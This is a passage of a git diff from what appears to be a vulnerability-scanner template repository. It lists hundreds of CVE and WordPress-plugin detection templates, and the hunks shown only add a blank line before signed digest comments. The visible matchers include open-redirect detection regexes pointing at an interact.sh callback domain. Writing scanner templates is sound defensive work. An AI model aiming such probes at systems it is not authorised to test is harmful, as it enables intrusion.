http/cves/2023/CVE-2023-1362.yaml | 3 +- http/cves/2023/CVE-2023-1408.yaml | 3 +- http/cves/2023/CVE-2023-1454.yaml | 3 +- http/cves/2023/CVE-2023-1496.yaml | 3 +- http/cves/2023/CVE-2023-1546.yaml | 3 +- http/cves/2023/CVE-2023-1671.yaml | 3 +- http/cves/2023/CVE-2023-1730.yaml | 3 +- http/cves/2023/CVE-2023-1780.yaml | 3 +- http/cves/2023/CVE-2023-1835.yaml | 3 +- http/cves/2023/CVE-2023-1880.yaml | 3 +- http/cves/2023/CVE-2023-1890.yaml | 3 +- http/cves/2023/CVE-2023-2009.yaml | 3 +- http/cves/2023/CVE-2023-2023.yaml | 3 +- http/cves/2023/CVE-2023-20864.yaml | 3 +- http/cves/2023/CVE-2023-20888.yaml | 3 +- http/cves/2023/CVE-2023-20889.yaml | 3 +- http/cves/2023/CVE-2023-2122.yaml | 3 +- http/cves/2023/CVE-2023-2130.yaml | 3 +- http/cves/2023/CVE-2023-2178.yaml | 3 +- http/cves/2023/CVE-2023-2224.yaml | 3 +- http/cves/2023/CVE-2023-22432.yaml | 3 +- http/cves/2023/CVE-2023-22463.yaml | 3 +- http/cves/2023/CVE-2023-22478.yaml | 3 +- http/cves/2023/CVE-2023-22480.yaml | 3 +- http/cves/2023/CVE-2023-22620.yaml | 3 +- http/cves/2023/CVE-2023-2272.yaml | 3 +- http/cves/2023/CVE-2023-22897.yaml | 3 +- http/cves/2023/CVE-2023-23161.yaml | 3 +- http/cves/2023/CVE-2023-23488.yaml | 3 +- http/cves/2023/CVE-2023-23489.yaml | 3 +- http/cves/2023/CVE-2023-23491.yaml | 3 +- http/cves/2023/CVE-2023-23492.yaml | 3 +- http/cves/2023/CVE-2023-2356.yaml | 3 +- http/cves/2023/CVE-2023-24044.yaml | 3 +- http/cves/2023/CVE-2023-24243.yaml | 3 +- http/cves/2023/CVE-2023-24278.yaml | 3 +- http/cves/2023/CVE-2023-24322.yaml | 3 +- http/cves/2023/CVE-2023-24488.yaml | 3 +- http/cves/2023/CVE-2023-24489.yaml | 1 + http/cves/2023/CVE-2023-24657.yaml | 3 +- http/cves/2023/CVE-2023-24733.yaml | 3 +- http/cves/2023/CVE-2023-24735.yaml | 3 +- http/cves/2023/CVE-2023-24737.yaml | 3 +- http/cves/2023/CVE-2023-2479.yaml | 3 +- http/cves/2023/CVE-2023-25135.yaml | 3 +- http/cves/2023/CVE-2023-25157.yaml | 3 +- http/cves/2023/CVE-2023-25346.yaml | 3 +- http/cves/2023/CVE-2023-25573.yaml | 3 +- http/cves/2023/CVE-2023-25717.yaml | 3 +- http/cves/2023/CVE-2023-26255.yaml | 3 +- http/cves/2023/CVE-2023-26360.yaml | 3 +- http/cves/2023/CVE-2023-26469.yaml | 3 +- http/cves/2023/CVE-2023-2648.yaml | 3 +- http/cves/2023/CVE-2023-26842.yaml | 3 +- http/cves/2023/CVE-2023-26843.yaml | 3 +- http/cves/2023/CVE-2023-27008.yaml | 3 +- http/cves/2023/CVE-2023-27034.yaml | 3 +- http/cves/2023/CVE-2023-27159.yaml | 3 +- http/cves/2023/CVE-2023-27179.yaml | 3 +- http/cves/2023/CVE-2023-27292.yaml | 3 +- http/cves/2023/CVE-2023-2732.yaml | 3 +- http/cves/2023/CVE-2023-27372.yaml | 3 +- http/cves/2023/CVE-2023-27482.yaml | 3 +- http/cves/2023/CVE-2023-27524.yaml | 3 +- http/cves/2023/CVE-2023-27587.yaml | 3 +- http/cves/2023/CVE-2023-2766.yaml | 3 +- http/cves/2023/CVE-2023-2779.yaml | 3 +- http/cves/2023/CVE-2023-2780.yaml | 3 +- http/cves/2023/CVE-2023-27922.yaml | 3 +- http/cves/2023/CVE-2023-2796.yaml | 3 +- http/cves/2023/CVE-2023-28121.yaml | 3 +- http/cves/2023/CVE-2023-2813.yaml | 3 +- http/cves/2023/CVE-2023-2825.yaml | 3 +- http/cves/2023/CVE-2023-28343.yaml | 3 +- http/cves/2023/CVE-2023-28665.yaml | 3 +- http/cves/2023/CVE-2023-29084.yaml | 3 +- http/cves/2023/CVE-2023-29298.yaml | 3 +- http/cves/2023/CVE-2023-29357.yaml | 3 +- http/cves/2023/CVE-2023-29439.yaml | 3 +- http/cves/2023/CVE-2023-29489.yaml | 3 +- http/cves/2023/CVE-2023-29622.yaml | 3 +- http/cves/2023/CVE-2023-29623.yaml | 3 +- http/cves/2023/CVE-2023-2982.yaml | 3 +- http/cves/2023/CVE-2023-29887.yaml | 3 +- http/cves/2023/CVE-2023-29919.yaml | 3 +- http/cves/2023/CVE-2023-29922.yaml | 3 +- http/cves/2023/CVE-2023-29923.yaml | 3 +- http/cves/2023/CVE-2023-30019.yaml | 3 +- http/cves/2023/CVE-2023-30150.yaml | 3 +- http/cves/2023/CVE-2023-30210.yaml | 3 +- http/cves/2023/CVE-2023-30212.yaml | 3 +- http/cves/2023/CVE-2023-30256.yaml | 3 +- http/cves/2023/CVE-2023-30777.yaml | 3 +- http/cves/2023/CVE-2023-30868.yaml | 3 +- http/cves/2023/CVE-2023-30943.yaml | 3 +- http/cves/2023/CVE-2023-31059.yaml | 3 +- http/cves/2023/CVE-2023-31465.yaml | 3 +- http/cves/2023/CVE-2023-31548.yaml | 3 +- http/cves/2023/CVE-2023-3219.yaml | 3 +- http/cves/2023/CVE-2023-32235.yaml | 3 +- http/cves/2023/CVE-2023-32243.yaml | 3 +- http/cves/2023/CVE-2023-32315.yaml | 3 +- http/cves/2023/CVE-2023-32563.yaml | 3 +- http/cves/2023/CVE-2023-33405.yaml | 3 +- http/cves/2023/CVE-2023-33439.yaml | 3 +- http/cves/2023/CVE-2023-33440.yaml | 3 +- http/cves/2023/CVE-2023-3345.yaml | 3 +- http/cves/2023/CVE-2023-33510.yaml | 3 +- http/cves/2023/CVE-2023-33568.yaml | 3 +- http/cves/2023/CVE-2023-33584.yaml | 3 +- http/cves/2023/CVE-2023-33831.yaml | 3 +- http/cves/2023/CVE-2023-34124.yaml | 5 +- http/cves/2023/CVE-2023-34192.yaml | 3 +- http/cves/2023/CVE-2023-34537.yaml | 3 +- http/cves/2023/CVE-2023-34598.yaml | 3 +- http/cves/2023/CVE-2023-34599.yaml | 3 +- http/cves/2023/CVE-2023-3460.yaml | 3 +- http/cves/2023/CVE-2023-34659.yaml | 3 +- http/cves/2023/CVE-2023-34751.yaml | 3 +- http/cves/2023/CVE-2023-34752.yaml | 3 +- http/cves/2023/CVE-2023-34753.yaml | 3 +- http/cves/2023/CVE-2023-34755.yaml | 3 +- http/cves/2023/CVE-2023-34756.yaml | 3 +- http/cves/2023/CVE-2023-3479.yaml | 3 +- http/cves/2023/CVE-2023-34843.yaml | 3 +- http/cves/2023/CVE-2023-35078.yaml | 3 +- http/cves/2023/CVE-2023-35082.yaml | 3 +- http/cves/2023/CVE-2023-35813.yaml | 3 +- http/cves/2023/CVE-2023-35843.yaml | 3 +- http/cves/2023/CVE-2023-35885.yaml | 3 +- http/cves/2023/CVE-2023-36287.yaml | 3 +- http/cves/2023/CVE-2023-36289.yaml | 3 +- http/cves/2023/CVE-2023-36306.yaml | 3 +- http/cves/2023/CVE-2023-36346.yaml | 3 +- http/cves/2023/CVE-2023-36844.yaml | 3 +- http/cves/2023/CVE-2023-36845.yaml | 3 +- http/cves/2023/CVE-2023-36934.yaml | 3 +- http/cves/2023/CVE-2023-3710.yaml | 3 +- http/cves/2023/CVE-2023-37265.yaml | 3 +- http/cves/2023/CVE-2023-37266.yaml | 3 +- http/cves/2023/CVE-2023-37270.yaml | 3 +- http/cves/2023/CVE-2023-37462.yaml | 3 +- http/cves/2023/CVE-2023-37474.yaml | 3 +- http/cves/2023/CVE-2023-37629.yaml | 3 +- http/cves/2023/CVE-2023-3765.yaml | 3 +- http/cves/2023/CVE-2023-37728.yaml | 3 +- http/cves/2023/CVE-2023-37979.yaml | 3 +- http/cves/2023/CVE-2023-38205.yaml | 3 +- http/cves/2023/CVE-2023-3836.yaml | 3 +- http/cves/2023/CVE-2023-3843.yaml | 3 +- http/cves/2023/CVE-2023-3844.yaml | 3 +- http/cves/2023/CVE-2023-3845.yaml | 3 +- http/cves/2023/CVE-2023-3846.yaml | 3 +- http/cves/2023/CVE-2023-3847.yaml | 3 +- http/cves/2023/CVE-2023-3848.yaml | 3 +- http/cves/2023/CVE-2023-3849.yaml | 3 +- http/cves/2023/CVE-2023-38501.yaml | 3 +- http/cves/2023/CVE-2023-39026.yaml | 3 +- http/cves/2023/CVE-2023-39108.yaml | 3 +- http/cves/2023/CVE-2023-39109.yaml | 3 +- http/cves/2023/CVE-2023-39110.yaml | 3 +- http/cves/2023/CVE-2023-39141.yaml | 3 +- http/cves/2023/CVE-2023-3936.yaml | 3 +- http/cves/2023/CVE-2023-39361.yaml | 3 +- http/cves/2023/CVE-2023-39598.yaml | 3 +- http/cves/2023/CVE-2023-39600.yaml | 3 +- http/cves/2023/CVE-2023-39676.yaml | 3 +- http/cves/2023/CVE-2023-39700.yaml | 3 +- http/cves/2023/CVE-2023-40208.yaml | 3 +- http/cves/2023/CVE-2023-4110.yaml | 3 +- http/cves/2023/CVE-2023-4111.yaml | 3 +- http/cves/2023/CVE-2023-4112.yaml | 3 +- http/cves/2023/CVE-2023-4113.yaml | 3 +- http/cves/2023/CVE-2023-4114.yaml | 3 +- http/cves/2023/CVE-2023-4115.yaml | 3 +- http/cves/2023/CVE-2023-4116.yaml | 3 +- http/cves/2023/CVE-2023-4148.yaml | 3 +- http/cves/2023/CVE-2023-41538.yaml | 3 +- http/cves/2023/CVE-2023-41642.yaml | 3 +- http/cves/2023/CVE-2023-4168.yaml | 3 +- http/cves/2023/CVE-2023-4173.yaml | 3 +- http/cves/2023/CVE-2023-4174.yaml | 3 +- http/cves/2023/CVE-2023-41892.yaml | 3 +- http/cves/2023/CVE-2023-42442.yaml | 3 +- http/cves/2023/CVE-2023-43261.yaml | 3 +- http/cves/2023/CVE-2023-4451.yaml | 3 +- http/cves/2023/CVE-2023-4547.yaml | 3 +- http/cves/2023/CVE-2023-4568.yaml | 3 +- http/cves/2023/CVE-2023-4582.yaml | 5 +- http/cves/2023/CVE-2023-4634.yaml | 3 +- http/cves/2023/CVE-2023-4714.yaml | 3 +- http/cves/2023/CVE-2023-4966.yaml | 12 +- http/cves/2023/CVE-2023-4974.yaml | 3 +- http/cves/2023/CVE-2023-5074.yaml | 3 +- http/cves/2023/CVE-2023-5244.yaml | 3 +- .../opentouch-multimediaservices-panel.yaml | 3 +- http/exposed-panels/solarwinds-arm-panel.yaml | 3 +- http/exposed-panels/webtitan-cloud-panel.yaml | 3 +- .../servicenow-widget-misconfig.yaml | 3 +- .../wordpress/plugins/ad-inserter.yaml | 3 +- .../wordpress/plugins/add-to-any.yaml | 3 +- .../wordpress/plugins/admin-menu-editor.yaml | 3 +- .../plugins/advanced-custom-fields.yaml | 3 +- .../wordpress/plugins/akismet.yaml | 3 +- .../plugins/all-404-redirect-to-homepage.yaml | 3 +- .../plugins/all-in-one-seo-pack.yaml | 3 +- .../plugins/all-in-one-wp-migration.yaml | 3 +- .../all-in-one-wp-security-and-firewall.yaml | 3 +- http/technologies/wordpress/plugins/amp.yaml | 3 +- .../wordpress/plugins/antispam-bee.yaml | 3 +- .../wordpress/plugins/astra-sites.yaml | 3 +- .../wordpress/plugins/astra-widgets.yaml | 3 +- .../wordpress/plugins/autoptimize.yaml | 3 +- .../wordpress/plugins/backwpup.yaml | 3 +- .../plugins/better-search-replace.yaml | 3 +- .../wordpress/plugins/better-wp-security.yaml | 3 +- .../plugins/black-studio-tinymce-widget.yaml | 3 +- .../wordpress/plugins/breadcrumb-navxt.yaml | 3 +- .../wordpress/plugins/breeze.yaml | 3 +- .../plugins/broken-link-checker.yaml | 3 +- .../plugins/child-theme-configurator.yaml | 3 +- .../wordpress/plugins/classic-editor.yaml | 3 +- .../wordpress/plugins/classic-widgets.yaml | 3 +- .../plugins/click-to-chat-for-whatsapp.yaml | 3 +- http/technologies/wordpress/plugins/cmb2.yaml | 3 +- .../wordpress/plugins/coblocks.yaml | 3 +- .../wordpress/plugins/code-snippets.yaml | 3 +- .../wordpress/plugins/coming-soon.yaml | 3 +- .../wordpress/plugins/complianz-gdpr.yaml | 3 +- .../plugins/contact-form-7-honeypot.yaml | 3 +- .../wordpress/plugins/contact-form-7.yaml | 3 +- .../wordpress/plugins/contact-form-cfdb7.yaml | 3 +- .../wordpress/plugins/cookie-law-info.yaml | 3 +- .../wordpress/plugins/cookie-notice.yaml | 3 +- .../wordpress/plugins/creame-whatsapp-me.yaml | 3 +- .../creative-mail-by-constant-contact.yaml | 3 +- .../wordpress/plugins/custom-css-js.yaml | 3 +- .../wordpress/plugins/custom-fonts.yaml | 3 +- .../plugins/custom-post-type-ui.yaml | 3 +- .../wordpress/plugins/disable-comments.yaml | 3 +- .../wordpress/plugins/disable-gutenberg.yaml | 3 +- .../wordpress/plugins/duplicate-page.yaml | 3 +- .../wordpress/plugins/duplicate-post.yaml | 3 +- .../wordpress/plugins/duplicator.yaml | 3 +- .../duracelltomi-google-tag-manager.yaml | 3 +- .../wordpress/plugins/easy-fancybox.yaml | 3 +- .../plugins/easy-table-of-contents.yaml | 3 +- .../wordpress/plugins/easy-wp-smtp.yaml | 3 +- .../wordpress/plugins/elementor.yaml | 3 +- .../wordpress/plugins/elementskit-lite.yaml | 3 +- .../plugins/enable-media-replace.yaml | 3 +- .../wordpress/plugins/envato-elements.yaml | 3 +- .../essential-addons-for-elementor-lite.yaml | 3 +- .../plugins/ewww-image-optimizer.yaml | 3 +- .../plugins/facebook-for-woocommerce.yaml | 3 +- .../wordpress/plugins/fast-indexing-api.yaml | 3 +- .../favicon-by-realfavicongenerator.yaml | 3 +- .../wordpress/plugins/flamingo.yaml | 3 +- .../wordpress/plugins/fluentform.yaml | 3 +- .../wordpress/plugins/font-awesome.yaml | 3 +- .../plugins/force-regenerate-thumbnails.yaml | 3 +- .../wordpress/plugins/formidable.yaml | 3 +- .../wordpress/plugins/forminator.yaml | 3 +- .../plugins/ga-google-analytics.yaml | 3 +- .../plugins/gdpr-cookie-compliance.yaml | 3 +- .../google-analytics-dashboard-for-wp.yaml | 3 +- .../google-analytics-for-wordpress.yaml | 3 +- .../plugins/google-listings-and-ads.yaml | 3 +- .../wordpress/plugins/google-site-kit.yaml | 3 +- .../plugins/google-sitemap-generator.yaml | 3 +- .../wordpress/plugins/gtranslate.yaml | 3 +- .../wordpress/plugins/gutenberg.yaml | 3 +- .../plugins/happy-elementor-addons.yaml | 3 +- .../plugins/header-footer-code-manager.yaml | 3 +- .../plugins/header-footer-elementor.yaml | 3 +- .../wordpress/plugins/header-footer.yaml | 3 +- .../wordpress/plugins/health-check.yaml | 3 +- .../wordpress/plugins/hello-dolly.yaml | 3 +- .../plugins/host-webfonts-local.yaml | 3 +- .../wordpress/plugins/imagify.yaml | 3 +- .../wordpress/plugins/imsanity.yaml | 3 +- .../plugins/insert-headers-and-footers.yaml | 3 +- .../wordpress/plugins/instagram-feed.yaml | 3 +- .../plugins/intuitive-custom-post-order.yaml | 3 +- .../wordpress/plugins/iwp-client.yaml | 3 +- .../wordpress/plugins/jetpack-boost.yaml | 3 +- .../wordpress/plugins/jetpack.yaml | 3 +- .../wordpress/plugins/kadence-blocks.yaml | 3 +- .../technologies/wordpress/plugins/kirki.yaml | 3 +- .../wordpress/plugins/leadin.yaml | 3 +- .../limit-login-attempts-reloaded.yaml | 3 +- .../plugins/limit-login-attempts.yaml | 3 +- .../wordpress/plugins/litespeed-cache.yaml | 3 +- .../wordpress/plugins/loco-translate.yaml | 3 +- .../wordpress/plugins/loginizer.yaml | 3 +- .../wordpress/plugins/loginpress.yaml | 3 +- .../plugins/mailchimp-for-woocommerce.yaml | 3 +- .../wordpress/plugins/mailchimp-for-wp.yaml | 3 +- .../wordpress/plugins/mailpoet.yaml | 3 +- .../wordpress/plugins/maintenance.yaml | 3 +- .../wordpress/plugins/mainwp-child.yaml | 3 +- .../wordpress/plugins/malcare-security.yaml | 3 +- .../wordpress/plugins/megamenu.yaml | 3 +- .../wordpress/plugins/members.yaml | 3 +- .../wordpress/plugins/meta-box.yaml | 3 +- .../wordpress/plugins/ml-slider.yaml | 3 +- .../wordpress/plugins/newsletter.yaml | 3 +- .../plugins/nextend-facebook-connect.yaml | 3 +- .../wordpress/plugins/nextgen-gallery.yaml | 3 +- .../wordpress/plugins/ninja-forms.yaml | 3 +- .../wordpress/plugins/ocean-extra.yaml | 3 +- .../plugins/official-facebook-pixel.yaml | 3 +- .../plugins/one-click-demo-import.yaml | 3 +- .../wordpress/plugins/optinmonster.yaml | 3 +- .../wordpress/plugins/otter-blocks.yaml | 3 +- .../wordpress/plugins/password-protected.yaml | 3 +- .../wordpress/plugins/pdf-embedder.yaml | 3 +- .../plugins/pinterest-for-woocommerce.yaml | 3 +- .../wordpress/plugins/pixelyoursite.yaml | 3 +- .../wordpress/plugins/polylang.yaml | 3 +- .../wordpress/plugins/popup-builder.yaml | 3 +- .../wordpress/plugins/popup-maker.yaml | 3 +- .../wordpress/plugins/post-smtp.yaml | 3 +- .../wordpress/plugins/post-types-order.yaml | 3 +- .../plugins/premium-addons-for-elementor.yaml | 3 +- .../wordpress/plugins/pretty-link.yaml | 3 +- .../plugins/really-simple-captcha.yaml | 3 +- .../wordpress/plugins/really-simple-ssl.yaml | 3 +- .../wordpress/plugins/redirection.yaml | 3 +- .../wordpress/plugins/redux-framework.yaml | 3 +- .../plugins/regenerate-thumbnails.yaml | 3 +- .../wordpress/plugins/safe-svg.yaml | 3 +- .../wordpress/plugins/seo-by-rank-math.yaml | 3 +- .../wordpress/plugins/sg-cachepress.yaml | 3 +- .../wordpress/plugins/sg-security.yaml | 3 +- .../plugins/shortcodes-ultimate.yaml | 3 +- .../plugins/shortpixel-image-optimiser.yaml | 3 +- .../plugins/simple-custom-post-order.yaml | 3 +- .../wordpress/plugins/siteguard.yaml | 3 +- .../wordpress/plugins/siteorigin-panels.yaml | 3 +- .../wordpress/plugins/smart-slider-3.yaml | 3 +- .../wordpress/plugins/so-widgets-bundle.yaml | 3 +- .../stops-core-theme-and-plugin-updates.yaml | 3 +- .../wordpress/plugins/sucuri-scanner.yaml | 3 +- .../wordpress/plugins/svg-support.yaml | 3 +- .../plugins/table-of-contents-plus.yaml | 3 +- .../wordpress/plugins/tablepress.yaml | 3 +- .../plugins/taxonomy-terms-order.yaml | 3 +- .../plugins/the-events-calendar.yaml | 3 +- .../wordpress/plugins/tinymce-advanced.yaml | 3 +- .../plugins/translatepress-multilingual.yaml | 3 +- .../ultimate-addons-for-gutenberg.yaml | 3 +- .../plugins/under-construction-page.yaml | 3 +- .../wordpress/plugins/updraftplus.yaml | 3 +- .../wordpress/plugins/use-any-font.yaml | 3 +- .../wordpress/plugins/user-role-editor.yaml | 3 +- .../plugins/velvet-blues-update-urls.yaml | 3 +- .../wordpress/plugins/w3-total-cache.yaml | 3 +- .../plugins/webp-converter-for-media.yaml | 3 +- .../wordpress/plugins/webp-express.yaml | 3 +- .../plugins/widget-importer-exporter.yaml | 3 +- .../woo-cart-abandonment-recovery.yaml | 3 +- .../woo-checkout-field-editor-pro.yaml | 3 +- .../plugins/woo-variation-swatches.yaml | 3 +- ...merce-gateway-paypal-express-checkout.yaml | 3 +- .../plugins/woocommerce-gateway-stripe.yaml | 3 +- .../plugins/woocommerce-payments.yaml | 3 +- .../plugins/woocommerce-paypal-payments.yaml | 3 +- ...oocommerce-pdf-invoices-packing-slips.yaml | 3 +- .../plugins/woocommerce-services.yaml | 3 +- .../wordpress/plugins/woocommerce.yaml | 3 +- .../wordpress/plugins/wordfence.yaml | 3 +- .../wordpress/plugins/wordpress-importer.yaml | 3 +- .../wordpress/plugins/wordpress-seo.yaml | 3 +- .../wordpress/plugins/worker.yaml | 3 +- .../wordpress/plugins/wp-fastest-cache.yaml | 3 +- .../wordpress/plugins/wp-file-manager.yaml | 3 +- .../wordpress/plugins/wp-google-maps.yaml | 3 +- .../wordpress/plugins/wp-mail-smtp.yaml | 3 +- .../plugins/wp-maintenance-mode.yaml | 3 +- .../wordpress/plugins/wp-migrate-db.yaml | 3 +- .../wordpress/plugins/wp-multibyte-patch.yaml | 3 +- .../wordpress/plugins/wp-optimize.yaml | 3 +- .../wordpress/plugins/wp-pagenavi.yaml | 3 +- .../wordpress/plugins/wp-reset.yaml | 3 +- .../plugins/wp-reviews-plugin-for-google.yaml | 3 +- .../wordpress/plugins/wp-rollback.yaml | 3 +- .../wordpress/plugins/wp-seopress.yaml | 3 +- .../wordpress/plugins/wp-sitemap-page.yaml | 3 +- .../wordpress/plugins/wp-smushit.yaml | 3 +- .../wordpress/plugins/wp-statistics.yaml | 3 +- .../wordpress/plugins/wp-super-cache.yaml | 3 +- .../wordpress/plugins/wp-user-avatar.yaml | 3 +- .../wordpress/plugins/wpcf7-recaptcha.yaml | 3 +- .../wordpress/plugins/wpcf7-redirect.yaml | 3 +- .../wordpress/plugins/wpforms-lite.yaml | 3 +- .../wordpress/plugins/wps-hide-login.yaml | 3 +- .../plugins/wpvivid-backuprestore.yaml | 3 +- .../plugins/yith-woocommerce-wishlist.yaml | 3 +- .../apache-druid-kafka-connect-rce.yaml | 3 +- .../other/livebos-file-read.yaml | 3 +- network/cves/2022/CVE-2022-31793.yaml | 3 +- 2055 files changed, 5611 insertions(+), 3366 deletions(-) diff --git a/file/url-analyse/url-extension-inspector.yaml b/file/url-analyse/url-extension-inspector.yaml index 6dc0a74714..b433d1ce1b 100644 --- a/file/url-analyse/url-extension-inspector.yaml +++ b/file/url-analyse/url-extension-inspector.yaml @@ -268,4 +268,5 @@ file: name: Windows BitLocker full volume encrypted data file regex: - "(?i)\\.fve('|\")" -# digest: 4a0a004730450220785c78ea3f7c51e19ac9e310581ea751f3abf740e18692a5077070922bb4266e022100a54c2d7503c313074a10895dfb6be5cc92494e5bcb083e32ba83d3a05e5da0b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220785c78ea3f7c51e19ac9e310581ea751f3abf740e18692a5077070922bb4266e022100a54c2d7503c313074a10895dfb6be5cc92494e5bcb083e32ba83d3a05e5da0b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index ebea1194dc..8caa140328 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201f63ac397a1e71eded581e99645541bae20b26cd9b0a52650dad53dbf303b381022100f26b41fb467bd1d8713ed8e680d5f648d1a962fd2a591417003bb7dd0bcbd238:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201f63ac397a1e71eded581e99645541bae20b26cd9b0a52650dad53dbf303b381022100f26b41fb467bd1d8713ed8e680d5f648d1a962fd2a591417003bb7dd0bcbd238:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 78a379c369..16639676b8 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f9f1e2735ff529fa4e1b8bccbe0be775e30c11e2617bf0413b0aa6ad2be6f679022100ad83000fcb18197d54cf5bb4769f1c32bab7c30bd75a635adc058dbb1a34e2f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f9f1e2735ff529fa4e1b8bccbe0be775e30c11e2617bf0413b0aa6ad2be6f679022100ad83000fcb18197d54cf5bb4769f1c32bab7c30bd75a635adc058dbb1a34e2f3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 5e56e96629..e100083ce3 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e48f2a3ab93123fd9c4c24145ee7571daa829660f6948fbbd5257aa764297464022018bedd4c2b86942d1420c78dfd506e956dd4118296e919e0cc494e66a05177d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e48f2a3ab93123fd9c4c24145ee7571daa829660f6948fbbd5257aa764297464022018bedd4c2b86942d1420c78dfd506e956dd4118296e919e0cc494e66a05177d0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index 85c1d12517..0b418717b7 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a0046304402205045e0e81c10b4b918188ae8aaae7b1af6b28b29deaf33f473aa615b91dded62022037b6ef07e93976af77a078837b582bc2a1d4d973e8fec0e6c0c3e0189836e394:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205045e0e81c10b4b918188ae8aaae7b1af6b28b29deaf33f473aa615b91dded62022037b6ef07e93976af77a078837b582bc2a1d4d973e8fec0e6c0c3e0189836e394:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index b69ca3856f..b7781a62a8 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ddb9c2ed32660d2e1b7b58036be02f2667176507014d85385d4341a55d12fbb02206a537ed56ed3134a7cf502f21a96fafb046f9845c50b878a94c58b6715b8dfea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008ddb9c2ed32660d2e1b7b58036be02f2667176507014d85385d4341a55d12fbb02206a537ed56ed3134a7cf502f21a96fafb046f9845c50b878a94c58b6715b8dfea:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index b7e24d4d1e..885132c1a7 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e0fff91a77e6df368096e47df58fb29c964f6ca33cb7a72550dd1c61ea68c7f022100aa534adf41734ec9a8f377c5f93de8c77a3cb5b8cf066d7f72c0f61918410f28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009e0fff91a77e6df368096e47df58fb29c964f6ca33cb7a72550dd1c61ea68c7f022100aa534adf41734ec9a8f377c5f93de8c77a3cb5b8cf066d7f72c0f61918410f28:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 15325a1b2a..27121b331c 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -40,4 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100d46d3b4e609c7eb510a4c89c281fed2885324ddbddd6b2e4265aba2fbd619049022100879e8ff60380458b0df146532c375b6ee62314a2cf9075806096d69b8b97b2bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d46d3b4e609c7eb510a4c89c281fed2885324ddbddd6b2e4265aba2fbd619049022100879e8ff60380458b0df146532c375b6ee62314a2cf9075806096d69b8b97b2bf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index ce76d2fdc0..005d99fedd 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220028832cf4d6c873776cdfccbba4badc08acdc40008f2da7998d14528cceabd8802200796e5b86f9abddf960a3c938b518cdc9c7be4365e7b046a40fab751a112446b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220028832cf4d6c873776cdfccbba4badc08acdc40008f2da7998d14528cceabd8802200796e5b86f9abddf960a3c938b518cdc9c7be4365e7b046a40fab751a112446b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 14c216c086..e767b5bf4f 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203857826fc2c11e7d7a6fd5d922540a3340f1a537502ed9bb9719e85d214490da022100b269c754ec288a1254698045fc368f261ecd8e8c493fa06e3d67a26f7d81f6d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203857826fc2c11e7d7a6fd5d922540a3340f1a537502ed9bb9719e85d214490da022100b269c754ec288a1254698045fc368f261ecd8e8c493fa06e3d67a26f7d81f6d1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2006/CVE-2006-2842.yaml 